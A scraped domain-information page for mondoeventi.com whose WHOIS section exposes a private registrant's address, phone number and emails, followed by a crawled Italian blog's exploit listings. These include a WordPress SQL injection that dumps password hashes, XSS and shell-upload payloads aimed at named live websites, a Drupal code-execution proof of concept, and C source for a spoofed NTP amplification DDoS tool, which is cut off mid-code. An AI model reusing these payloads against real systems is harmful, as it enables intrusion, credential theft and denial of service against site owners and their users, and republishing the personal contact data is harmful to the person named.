INSERT INTO sites(host) VALUES('mondoeventi.com') 1045: Access denied for user 'www-data'@'localhost' (using password: NO) mondoeventi.com Estimated Worth $227,244 - MYIP.NET Website Information
Welcome to MyIP.net!
 Set MYIP as homepage      

  
           

Web Page Information

Title:
Meta Description:
Meta Keywords:
sponsored links:
Links:
Images:
Age:
sponsored links:

Traffic and Estimation

Traffic:
Estimation:

Website Ranks

Alexa Rank:
Google Page Rank:
Sogou Rank:
Baidu Cache:

Search Engine Indexed

Search EngineIndexedLinks
 Google:
 Bing:
 Yahoo!:
 Baidu:
 Sogou:
 Youdao:
 Soso:

Server Data

Web Server:
IP address:    
Location:

Registry information

Registrant:
Email:
ICANN Registrar:
Created:
Updated:
Expires:
Status:
Name Server:
Whois Server:

Alexa Rank and trends

Traffic: Today One Week Avg. Three Mon. Avg.
Rank:
PV:
Unique IP:

More ranks in the world

Users from these countries/regions

Where people go on this site

Alexa Charts

Alexa Reach and Rank

Whois data

Who is mondoeventi.com at whois.ascio.com

Domain Name: mondoeventi.com

Registry Domain ID: 759857074_DOMAIN_COM-VRSN

Registrar WHOIS Server: whois.ascio.com

Registrar URL: http://www.ascio.com

Updated Date: 2016-01-18T22:55:11Z

Creation Date: 2007-01-17T04:12:57Z

Registrar Registration Expiration Date: 2017-01-17T00:00:00Z

Registrar: Ascio Technologies, Inc

Registrar IANA ID: 106

Registrar Abuse Contact Email: abuse

Registrar Abuse Contact Phone: +44.2070159370

For more information on Whois status codes, please visit https://icann.org/epp

Domain Status: OK

Registry Registrant ID:

Registrant Name: D'ANGELI PAOLO

Registrant Organization:

Registrant Street: VIA CONCA D'ORO 184

Registrant City: ROMA

Registrant State/Province: IT

Registrant Postal Code: 00141

Registrant Country: IT

Registrant Phone: +39.3400906285

Registrant Phone Ext:

Registrant Fax:

Registrant Fax Ext:

Registrant Email: mondoeventi@gmail.com

Registry Admin ID:

Admin Name: PAOLO DANGELI

Admin Organization:

Admin Street: VIA CONCA DORO 190

Admin City: ROMA

Admin State/Province: IT

Admin Postal Code: 00141

Admin Country: IT

Admin Phone: +39.3400906285

Admin Phone Ext:

Admin Fax:

Admin Fax Ext:

Admin Email: dangeli@asdc.asi.it

Registry Tech ID:

Tech Name: Registrazione Domini

Tech Organization: Energ.it S.p.A.

Tech Street: via Efisio Melis, 26

Tech City: Cagliari

Tech State/Province:

Tech Postal Code: 09134

Tech Country: IT

Tech Phone: +39.0707521

Tech Phone Ext:

Tech Fax:

Tech Fax Ext:

Tech Email: domainmaster@energit.it

Name Server: protone.dns.tiscali.it

Name Server: elettrone.dns.tiscali.it

DNSSEC: unsigned

URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

>>> Last update of WHOIS database: 2016-11-20T07:11:22 UTC <<<



The data in Ascio Technologies' WHOIS database is provided

by Ascio Technologies for information purposes only. By submitting

a WHOIS query, you agree that you will use this data only for lawful

purpose. In addition, you agree not to:

(a) use the data to allow, enable, or otherwise support any marketing

activities, regardless of the medium used. Such media include but are

not limited to e-mail, telephone, facsimile, postal mail, SMS, and

wireless alerts; or

(b) use the data to enable high volume, automated, electronic processes

that sendqueries or data to the systems of any Registry Operator or

ICANN-Accredited registrar, except as reasonably necessary to register

domain names or modify existing registrations.

(c) sell or redistribute the data except insofar as it has been

incorporated into a value-added product or service that does not permit

the extraction of a substantial portion of the bulk data from the value-added

product or service for use by other parties.

Ascio Technologies reserves the right to modify these terms at any time.

Ascio Technologies cannot guarantee the accuracy of the data provided.

By accessing and using Ascio Technologies WHOIS service, you agree to these terms.

Front Page Thumbnail

sponsored links:

Front Page Loading Time

Keyword Hits (Biger,better)

Other TLDs of mondoeventi

TLDs Created Expires Registered
.com
.net
.org
.cn
.com.cn
.asia
.mobi

Similar Websites

More...
Alexa鏍囬

Search Engine Spider Emulation

Title:MondoUnix - Unix,Linux,FreeBSD,Howto,Networking,Ipv6
Description:MondoUnix,Unix,Linux,FreeBSD,Howto,Networking,Ipv6,programmazione,virtualizzazione,sistemi operativi,database
Keywords:Unix,Linux,FreeBSD,Howto,Networking,Ipv6,programmazione,virtualizzazione
Body:
MondoUnix - Unix,Linux,FreeBSD,Howto,Networking,Ipv6
MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6
Iscriviti via RSS
Home
Elenco IP Bloccati
Date 2 Timestamp
Elenco subnet bloccate
UNIX
Mappa sito
Exploit database
WordPress Security
Joomla Security
Drupal security
22May/140
WordPress Booking System SQL Injection
# Exploit Title: Wordpress Booking System (Booking Calendar) plugin
SQL Injection
# Release Date: 2014-05-21
# Author: maodun
# Contact: Twitter: @conmancm
# Software Link: http://wordpress.org/support/plugin/booking-system
# Affected version: lt; 1.3
# Google Dork: inurl:/wp-content/plugins/booking-system/
# REF:CVE-2014-3210
-----------------------------------------------------------------------------------------------------------------
# Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.
-------------------------------------------------------------------------------------------------------------------------
# SQLi - Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php
vulnerabile parameter:$_POST['booking_form_id']
POC:
POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 149
Cookie: [your cookie]
action=dopbs_show_booking_form_fields amp;booking_form_id=100 union select
1,2,3,4,5,6,7,8,9,hex(concat(user_login,user_pass)) from
wp_users# amp;language=cr
response:
lt;input type= quot;hidden quot; name= quot;booking-form-field-translation-1 quot;
id= quot;booking-form-field-translation-1 quot; value= quot;[hex value here] quot; / gt;
-------------------------------------------------------------------------------------------------------------------------
# Patch:
-- Vendor was notified on the 2014-05-05
-- Vendor released version 1.3 on 2014-05-06 Fixed the bug
(65)
Tag: 0DAY, BOOKING SYSTEM, EXPLOIT, LINUX, PHP, PLUGINS, REMOTE, SECURITY, SICUREZZA, SQL INJECTION, SQL-I, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS, WORDPRESS SECURITY, WP-CONTENT
Nessun commento
22May/140
WordPress Simple Popup Cross Site Scripting
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Wordpress simple popup images Cross site
scripting Vulnerability
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : Date: 2014-05-21
|
| [*] Vendor Homepage : http://www.wordpress.org
|
| [*] Google Dork: inurl:wp-content/plugins/simple-popup-images
|
| [*] Tested on: Windows 7
|
| [*] Web browser : mozilla firefox
|-------------------------------------------------------------------------|
|
| [*] Location :
[localhost]/wp-content/plugins/simple-popup-images/popup.php?z=[XSS]
|
|-------------------------------------------------------------------------|
| [*] Proof:
|
| [*]
http://www.itstopeka.com/ITSblog/wp-content/plugins/simple-popup-images/popup.php?z= quot;/ gt; lt;script gt;alert(1); lt;/script gt;
|
| [*]
http://www.easywebcreations.com/wp-content/plugins/simple-popup-images/popup.php?z= quot;/ gt; lt;script gt;alert(1); lt;/script gt;
|
| [*]
http://www.stealthcopter.com/blog/wp-content/plugins/simple-popup-images/popup.php?z= quot;/ gt; lt;script gt;alert(1); lt;/script gt;
|
| [*]
http://www.pferdehof-muellerschoen.de/wp-content/plugins/simple-popup-images/popup.php?z= quot;/ gt; lt;script gt;alert(1); lt;/script gt;
|
| [*]
http://www.wabei-mono.com/embroidery/wp-content/plugins/simple-popup-images/popup.php?z= quot;/ gt; lt;script gt;alert(1); lt;/script gt;
|-------------------------------------------------------------------------|
| [*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
(15)
Tag: 0DAY, CROSS SITE SCRIPTING, EXPLOIT, LINUX, PHP, PLUGINS, REMOTE, SECURITY, SICUREZZA, SIMPLE POPUP, SIMPLE_POPUP, SIMPLE_POPUP.PHP, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS, WORDPRESS SECURITY, WP-CONTENT, XSS
Nessun commento
19May/140
WordPress cnhk-slideshow Shell Upload
###############################################################
# Exploit Title: Wordpress cnhk-slideshow plugin Shell Upload
# Author: Ashiyane Digital Security Team
# Date: 05/18/2014
# Vendor Homepage: http://cnhk-systems.webege.com
# Software Link : http://downloads.wordpress.org/plugin/cnhk-slideshow.2.1.1.zip
# Google dork: inurl:/wp-content/plugins/cnhk-slideshow/
# Tested on: Windows/Linux
###############################################################
1) Exploit :
= = = = = =
lt;?php
$uploadfile= quot;file.php quot;;
$ch = curl_init( quot;
http://localhost/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php quot;);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('slideshow'= gt; quot;@$uploadfile quot;));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print quot;$result quot;;
? gt;
2) Exploit demo :
= = = = = = = = =
http://ceochallengeaustralia.org/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php
http://www.nhbcc.org/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php
http://casaoccio.org/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php
http://armorroofingspringfield.com/wp-content/plugins/cnhk-slideshow/uploadify/uploadify.php
# #### #### #### #### #### #### #### #### #
http://[Target]/wp-content/uploads/[file].php
OR
http://[Target]/wp-content/plugins/cnhk-slideshow/[file].php
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #
(82)
Tag: 0DAY, ADMIN, CNHK, CNHK-SLIDESHOW, EXPLOIT, LINUX, PHP, PLUGINS, REMOTE, SCRIPT, SECURITY, SHELL UPLOAD, SICUREZZA, SLIDESHOW, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS SECURITY, WP-CONTENT
Nessun commento
12May/140
Drupal Flag 7.x-3.5 Command Execution
Drupal Flag 7.x-3.5 Module Vulnerability Report
Author: Ubani Anthony Balogun lt;ubani@sas.upenn.edu gt;
Reported: May 07, 2014
Module Description:
- -------------------
Flag is a flexible flagging system that is completely customizable by
the administrator.
Using this module, the site administrator can provide any number of
flags for nodes, comments,
users, and any other type of entity. Some possibilities include
bookmarks, marking important,
friends, or flag as offensive. With extensive views integration, you
can create custom lists of
popular content or keep tabs on important content.
Description of Vulnerability:
- -----------------------------
The Flag 7.x-3.5 module contains an improper input handling (IH)
vulnerability created by it's failure to validate user
supplied PHP code, input via it's quot;flag importer quot; form, before using
PHP's quot;eval quot; function to execute the code on the server.
Using the flag importer form, a malicious user is able to execute
arbitrary code with the permissions of the server on the host machine.
Systems Impacted:
- ----------------
Drupal 7.26 with Flag 7.x-3.0 and Flag 7.x-3.5 (current recommended
release) were tested and found to be vulnerable
Impact:
- -------
Users with the permission to use the flag importer can inject and
execute arbitrary code on the host server with server permissions.
This vulnerability can be exploited to upload a malicious payload onto
the vulnerable server, mount a Denial of Service (DoS) attack
or effect other server-side attacks.
Mitigating Factors:
- -------------------
This vulnerability is mitigated by the fact that a user must have
permission to use the flag importer. The Flag module
deactivates this permission by default for users other than site
administrators, and cautions adminsitrators against granting
this permission to other roles.
Proof of Concept:
- -----------------
1. Install and enable the Flag module
2. Using an account with permissions to use the flag importer,
navigate to the flag import page (?q=admin/structure/flags/import)
and submit the below code via the quot;Flag import code quot; text area:
//Valid flag definition. This is required to successfully submit the
flag import form
$flags = array();
// Exported flag: quot;Bookmarks quot;.
$flags['bookmarks'] = array (
'entity_type' = gt; 'node',
'title' = gt; 'Bookmarks',
'global' = gt; '0',
'types' = gt;
array (
0 = gt; 'article',
1 = gt; 'page',
2 = gt; 'people',
),
'flag_short' = gt; 'Bookmark this',
'flag_long' = gt; 'Add this post to your bookmarks',
'flag_message' = gt; 'This post has been added to your bookmarks',
'unflag_short' = gt; 'Unbookmark this',
'unflag_long' = gt; 'Remove this post from your bookmarks',
'unflag_message' = gt; 'This post has been removed from your bookmarks',
'unflag_denied_text' = gt; '',
'link_type' = gt; 'toggle',
'weight' = gt; 0,
'show_in_links' = gt;
array (
'full' = gt; 'full',
'teaser' = gt; 'teaser',
'rss' = gt; 'rss',
'search_index' = gt; 'search_index',
'search_result' = gt; 'search_result',
),
'show_as_field' = gt; 1,
'show_on_form' = gt; 1,
'access_author' = gt; '',
'show_contextual_link' = gt; 1,
'i18n' = gt; 0,
'api_version' = gt; 3,
);
// Malicious user input. Any amount of arbitrary code can be run after
here and before the quot;return flags quot; statement
system( quot;whoami gt; /tmp/whoami.txt; quot;);
system( quot;echo \ quot; lt;?php echo 'I p0wn Server now'; ? gt;\ quot; gt; gt;
/tmp/do_evil.php; quot;);
return $flags;
3. On the server machine, navigate to the /tmp directory to find the
created files quot;whoami.txt quot; and quot;do_evil.php quot;.
quot;whoami.txt quot; contains the user who executed the code above
(server). quot;do_evil.php quot; contains the PHP code submitted
via the flag importer form above.
Note: This proof of concept assumes a linux server is being used. This
does not imply that non-linux systems are not
vulnerable.
Patch:
- ------
The following patch mitigates the vulnerability
- --- flag-7.x-3.5_vuln/flag/includes/flag.export.inc 2014-05-03
06:39:27.000000000 -0400
+++
/var/www/html/drupal-7.26/sites/all/modules/flag/includes/flag.export.inc
2014-05-07 12:28:19.780973535 -0400
@@ -99,8 +99,17 @@ function flag_import_form() {
*/
function flag_import_form_validate($form, amp;$form_state) {
$flags = array();
+
+ $code = $form_state['values']['import'];
+ $regex =
'#\b(?:(?!array)(?!flags\[))(\$)*([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\s*(\[.*|\(.*))#';
# Regular expression to catch function calls except array(), and
prevent all arrays that aren't of the form quot;flags[] quot; from being
created and used
+
+ if (preg_match($regex,$code,$match)){
+ form_set_error('import',t('The flag import failed because the
following function call was detected in the code: %func',
array('%func' = gt; $match[0])));
+ return;
+ }
+
ob_start();
- - eval($form_state['values']['import']);
+ eval($code);
ob_end_clean();
if (!isset($flags) || !is_array($flags)) {
Vendor Response:
- ---------------------
The Drupal Security team was contacted on May 8, 2014 and responded
that because the permissions assignment page
carries the warning quot;Warning: Give to trusted roles only; this
permission has security implications. quot; a coordinated
security fix and announcement is not warranted.
- --
Ubani Anthony Balogun
Information Security and Unix Services
University of Pennsylvania
School of Arts and Sciences
3600 Market St.
Suite 501
Philadelphia, PA 19104
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
(129)
Tag: 0DAY, CMS, COMMAND EXECUTION, DRUPAL, EXPLOIT, FLAG, LINUX, MODULE, PHP, REMOTE, REMOTE COMMAND EXECUTION, SECURITY, SICUREZZA, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS
Nessun commento
12May/140
WordPress Bonuspressx Cross Site Scripting
############################################
[+] Exploit Title : Wordpress Bonuspressx Plugin Cross Site Scripting
[+] Exploit Author : Ashiyane Digital Security Team
[+] Vendor Homepage : http://wordpress.org
[+] Google Dork : inurl:/wp-content/plugins/bonuspressx
[+] Date : 2014-04-23
[+] Tested on : Windows 7 , Mozilla FireFox
############################################
[+] Exploit : Cross Site Scripting
[+] Location :
[Target]/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=[XSS]
############################################
[+] Demo :
#
http://megabon.us/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://dsimple.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://cachkiemtienonline.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://markcall.com/bonus/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://onlinekarrier.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://imhoangtram.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://imakingmoney.net/blog/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://senukeinferno.com//wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://emarky.net/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
http://viraloptins.com/wp-content/plugins/bonuspressx/inc/ar_submit.php?id=2 amp;n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
############################################
Discovered By : Milad Hacking amp; Cyber Injector
We Love Mohammad
Mail : milad.hacking.blackhat@gmail.com
Home Page : https://www.facebook.com/milad.hacking.5
############################################
(185)
Tag: 0DAY, AR_SUBMIT, AR_SUBMIT.PHP, BONUSPRESSX, CROSS SITE SCRIPTING, EXPLOIT, LINUX, PHP, PLUGIN, PLUGINS, REMOTE, SECURITY, SICUREZZA, UNIX, UPLOADHANDLER, UPLOADHANDLER.PHP, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS, WORDPRESS SECURITY, WP SECURITY, XSS
Nessun commento
7May/140
Offiria Cross-Site Scripting XSS
Advisory ID: HTB23210
Product: Offiria
Vendor: Slashes amp;amp; Dots Sdn Bhd.
Vulnerable Version(s): 2.1.0 and probably prior
Tested Version: 2.1.0
Advisory Publication: April 2, 2014 [without technical details]
Vendor Notification: April 2, 2014
Public Disclosure: May 7, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-2689
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Offiria, which can be exploited to perform
Cross-Site Scripting (XSS) attacks against users of vulnerable application.
1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689
The vulnerability exists due to insufficient sanitisation of user-supplied data in URI after quot;/installer/index.php quot;
script that is not removed from the system by default. A remote attacker can trick a logged-in user to open a specially
crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The following exploitation example displays quot;immuniweb quot; word:
http://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E
-----------------------------------------------------------------------------------------------
Solution:
Currently we are not aware of any official solution for this vulnerability. The vendor did not respond to:
- 6 notifications by email
- 1 notification via twitter
- 1 notification via GitHub
As a temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file
or WAF.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23210 - https://www.htbridge.com/advisory/HTB23210 - Cross-Site Scripting (XSS) in
Offiria.
[2] Offiria - https://offiria.com - Offiria is a private, secure Enterprise Social Network for your organization.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE
is a formal list of software weakness types.
[4] ImmuniWeb庐 - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment
solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided quot;as is quot; and without any warranty of any kind. Details
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.
(353)
Tag: 0DAY, CROSS SITE SCRIPTING, EXPLOIT, LINUX, OFFIRIA, PHP, REMOTE, SECURITY, SICUREZZA, UNIX, VULNERABILITIES, VULNERABILITY, WEBAPPS, XSS
Nessun commento
7May/140
WordPress Photo-Gallery Cross Site Request Forgery
[+] Wordpress Cross Site Request Forgery in Plugin photo-gallery
[+] Date: 07/05/2014
[+] Risk: HIGH
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://wordpress.org/plugins/photo-gallery/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: UploadHandler.php
[+] Dork: inurl: quot;wp-content/plugins/photo-gallery/filemanager quot;
[+] Exploit :
lt;form enctype= quot;multipart/form-data quot;
action= quot;http://host/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php quot; method= quot;post quot; gt;
Your File: lt;input name= quot;uploadfile quot; type= quot;file quot; / gt; lt;br / gt;
lt;input type= quot;submit quot; value= quot;upload quot; / gt;
lt;/form gt;
[+] PoC : http://klikkit.co.uk/silvio/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php
http://mii-gamer.com/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php
http://www.bentart.com.au/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php
(347)
Tag: 0DAY, CROSS SITE REQUEST FORGERY, CSRF, EXPLOIT, FILEMANAGER, LINUX, PHOTO-GALLERY, PHP, PLUGIN, PLUGINS, REMOTE, SCRIPT, SECURITY, SICUREZZA, UNIX, UPLOADHANDLER, UPLOADHANDLER.PHP, VULNERABILITIES, VULNERABILITY, WEBAPPS, WORDPRESS SECURITY, WP-CONTENT
Nessun commento
6May/140
WordPress multiple vulnerabilities Flexolio theme
Hello list!
There are Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities in Flexolio for WordPress. Which contains TimThumb and CU3ER.
In April 2011 I wrote about vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and in April 2014 I wrote about vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244).
-------------------------
Affected products:
-------------------------
Vulnerable are all versions of Flexolio.
-------------------------
Affected vendors:
-------------------------
Quarterpixel
http://quarterpixel.de
----------
Details:
----------
Content Spoofing (Content Injection) (WASC-12):
http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml
File 1.xml:
lt;?xml version= quot;1.0 quot; encoding= quot;UTF-8 quot;? gt;
lt;cu3er gt;
lt;slides gt;
lt;slide gt;
lt;url gt;1.jpg lt;/url gt;
lt;link gt;http://websecurity.com.ua lt;/link gt;
lt;/slide gt;
lt;/slides gt;
lt;/cu3er gt;
Cross-Site Scripting (WASC-08):
http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2
File xss.xml:
lt;?xml version= quot;1.0 quot; encoding= quot;UTF-8 quot;? gt;
lt;cu3er gt;
lt;slides gt;
lt;slide gt;
lt;url gt;1.jpg lt;/url gt;
lt;link gt;javascript:alert(document.cookie) lt;/link gt;
lt;/slide gt;
lt;/slides gt;
lt;/cu3er gt;
For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files.
Cross-Site Scripting (WASC-08):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure (WASC-13):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://
And also Abuse of Functionality and DoS in vulnerabilities in TimThumb (http://seclists.org/fulldisclosure/2011/Apr/227) and Arbitrary File Upload vulnerability, which was disclosed after 3,5 months after my disclosure of previous holes. They are possible in old versions of the theme, because in the last versions of the theme in TimThumb the access to remote sites is forbidden.
Arbitrary File Upload (WASC-31):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php
Full path disclosure (WASC-13):
FPD in php-files of the theme (by default) or in error_log. In index.php and other php-files.
http://site/wp-content/themes/webfolio/
------------
Timeline:
------------
2013.11.22 - announced at my site about CU3ER.
2013.11.26 - informed developer.
2013.11.26 - announced at my site about plugins and later about themes. Later informed developers of the plugins and themes. 2014.04.26 - disclosed at my site about Flexolio for WordPress (http://websecurity.com.ua/7141/).
Best wishes amp; regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
(559)
Tag: 0DAY, ARBITRARY FILE UPLOAD, CROSS SITE SCRIPTING, EXPLOIT, FLEXOLIO, FULL PATH DISCLOSURE, FUNCTION, LINUX, MULTIPLE, PHP, REMOTE, SECURITY, SICUREZZA, SQL INJECTION, SQL-I, THEMES, TUMB.PHP, UNIX, VULNERABILITIES, VULNERABILITY, WASC-08, WASC-13, WASC-31, WEBAPPS, WORDPRESS, WORDPRESS SECURITY, XSS
Nessun commento
5May/140
NTP DDoS Amplification
/*
* Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification
* Date: 28/04/2014
* Code Author: Danilo PC - lt;DaNotKnow@gmail.com gt;
* CVE : CVE-2013-5211
*/
/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)
* I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there,
* if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please.
*/
/* MODIFICATION */
/*---------------------------------------------------------------------------------------------------------------
* ntpd 'get monlist' ddos amplification cve-2013-5211 exploit Todor Donev (todor.donev @@ gmail.com)
*---------------------------------------------------------------------------------------------------------------
* A Network Time Protocol (NTP) Amplification attack is an emerging form of Distributed Denial of Service (DDoS)
* that relies on the use of publically accessible NTP servers to overwhelm a victim system with UDP traffic.
*
* The attack relies on the exploitation of the 'monlist' feature of NTP, as described in CVE-2013-5211, which is
* enabled by default on older NTP-capable devices. This command causes a list of the last 600 IP addresses which
* connected to the NTP server to be sent to the victim. Due to the spoofed source address, when the NTP server
* sends the response it is sent instead to the victim. Because the size of the response is typically considerably
* larger than the request, the attacker is able to amplify the volume of traffic directed at the victim.
* Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult
* to block these types of attacks. The solution is to disable 鈥渕onlist鈥 within the NTP server or to upgrade to
* the latest version of NTP (4.2.7) which disables the 鈥渕onlist鈥 functionality.
*---------------------------------------------------------------------------------------------------------------
* PoC generate and send 1 spoofed packet and don't do enough to Distributed Denial of Service.I'm made loop for
* sending multiple packets. Now this exploit is very dangerous against unpatched NTP servers. They can respond
* back to spoofed IP address (victim). The size of the response is typically considerably larger than the request.
*---------------------------------------------------------------------------------------------------------------
* use at your own risk | use at your own risk | use at your own risk | use at your own risk | use at your own risk
*---------------------------------------------------------------------------------------------------------------
*/
#include lt;stdio.h gt; // For on printf function
#include lt;string.h gt; // For memset
#include lt;sys/socket.h gt; // Structs and Functions used for sockets operations.
#include lt;stdlib.h gt; // For exit function
#include lt;netinet/ip.h gt; // Structs for IP header
// Struct for UDP Packet
struct udpheader{
unsigned short int udp_sourcePortNumber;
unsigned short int udp_destinationPortNumber;
unsigned short int udp_length;
unsigned short int udp_checksum;
};
// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
struct ntpreqheader {
unsigned char rm_vn_mode; /* response, more, version, mode */
unsigned char auth_seq; /* key, sequence number */
unsigned char implementation; /* implementation number */
unsigned char request; /* request number */
unsigned short err_nitems; /* error code/number of data items */
unsigned short mbz_itemsize; /* item size */
char data[40]; /* data area [32 prev](176 byte max) */
unsigned long tstamp; /* time stamp, for authentication */
unsigned int keyid; /* encryption key */
char mac[8]; /* (optional) 8 byte auth code */
};
// Calculates the checksum of the ip header.
unsigned short csum(unsigned short *ptr,int nbytes)
{
register long sum;
unsigned short oddbyte;
register short answer;
sum=0;
while(nbytes gt;1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*) amp;oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}
sum = (sum gt; gt;16)+(sum amp; 0xffff);
sum = sum + (sum gt; gt;16);
answer=(short)~sum;
return(answer);
}
// Da MAIN
int main(int argc, char **argv)
{
int status; // Maintains the return values of the functions
struct iphdr *ip; // Pointer to ip header struct
struct udpheader *udp; // Pointer to udp header struct
struct ntpreqheader *ntp; // Pointer to ntp request header struct
int sockfd; // Maintains the socket file descriptor
int one = 1; // Sets the option IP_HDRINCL of the sockt to tell
// the kernel that the header are alredy included on the packets.
struct sockaddr_in dest; // Maintains the data of the destination address
printf( quot; [o] ntpd 'get monlist' ddos amplification cve-2013-5211 exploit \n quot;);
// Packet itself
char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ];
// Parameters check
if( argc != 3){
printf( quot; [o] usg: ./ntpamp lt;src gt; lt;ntpd gt;\n quot;);
exit(1);
}
// quot;Zeroes quot; all the packet stack
memset( packet, 0, sizeof(packet) );
// Mounts the packet headers
// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] -- gt; Victory!!!
ip = (struct iphdr *)packet;
udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
// Fill the IP Header
ip- gt;version = 4; // IPv4
ip- gt;ihl = 5; // Size of the Ip header, minimum 5
ip- gt;tos = 0; // Type of service, the default value is 0
ip- gt;tot_len = sizeof(packet); // Size of the datagram
ip- gt;id = htons(1234); // LengthIdentification Number
ip- gt;frag_off = 0; // Flags, zero represents reserved
ip- gt;ttl = 255; // Time to Live. Maximum of 255
ip- gt;protocol = IPPROTO_UDP; // Sets the UDP as the next layer protocol
ip- gt;check = 0; // Checksum.
